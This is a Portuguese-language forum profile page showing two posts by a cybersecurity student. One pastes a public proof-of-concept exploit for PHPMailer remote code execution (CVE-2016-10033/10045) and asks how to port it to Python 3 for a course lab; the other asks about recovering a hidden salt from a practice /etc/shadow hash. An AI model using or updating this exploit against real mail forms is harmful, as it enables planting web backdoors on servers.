Jump to content

Leandrok

Membros
  • Contagem de Conteúdo

    2
  • Ingressou

  • Última visita

Informações Pessoais

  • Cidade
    rio pardo
  • Estado
    Rio Grande do Sul (RS)

Clientes & Parceiros

  • Você é um cliente TecnoSpeed?
    Sim
  • Você é um parceiro da Casa do Desenvolvedor?
    Não

Conquistas de Leandrok

0

Reputação na Comunidade

  1. Leandrok

    Xploit

    Olá a todos! Eu tenho um LAB do Curso de Segurança Cibernética onde preciso explorar uma vulnerabilidade antiga. O exploit que encontrei está reclamando por ter sido escrito a anos atrás, obviamente. Gostaria de saber ser é possível alterar e fazer ele rodar. Tentei modificar porém continua retornando muitos erros. Irei mandar o ORIGINAL sem as modificações com os primeiros erros que retornam. Versão Python do meu sistema: Python 3.10.9 Retorno de erros: Traceback (most recent call last): File "/root/XPLOIT/xpl_phpmailer.py", line 5, in <module> import urllib2 ModuleNotFoundError: No module named 'urllib2' ******************************************************************************************** ⬇️ EXPLOIT ⬇️ ********************************************************************************************* #!/usr/bin/python intro = """ PHPMailer RCE PoC Exploits PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) + PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) (the bypass of the first patch for CVE-2016-10033) Discovered and Coded by: Dawid Golunski @dawid_golunski https://legalhackers.com """ usage = """ Usage: Full Advisory: https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html PoC Video: https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html Disclaimer: For testing purposes only. Do no harm. """ import time import urllib import urllib2 import socket import sys RW_DIR = "/var/www/html/uploads" url = 'http://VictimWebServer/contact_form.php' # Set destination URL here # Choose/uncomment one of the payloads: # PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033) #payload = '"attacker\\" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR # Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045) payload = "\"attacker\\' -oQ/tmp/ -X%s/phpcode.php some\"@email.com" % RW_DIR ###################################### # PHP code to be saved into the backdoor php file on the target in RW_DIR RCE_PHP_CODE = "<?php phpinfo(); ?>" post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE} # Attack data = urllib.urlencode(post_fields) req = urllib2.Request(url, data) response = urllib2.urlopen(req) the_page = response.read()
  2. Boa noite! Estou estudando Cibersegurança e tenho uma tarefa onde não tenho conhecimento e nem mesmo criatividade de elaborar. Foi colocado uma tarefa de encontrar um salt de uma hash; Essa Hash está com o Salt oculto e temos que encontrar para formar o hash completo. Só que essa hash ela é fictícia de um arquivo do /etc/shadow. Diferente de você criar uma palavra e fazer criptografia. É parte de um desafio. Eu tenho como conseguir ajuda dos monitores... Mas primeiro quero tentar. Se alguém puder me ajudar com esse raciocínio lógico agradeço.
×
×
  • Create New...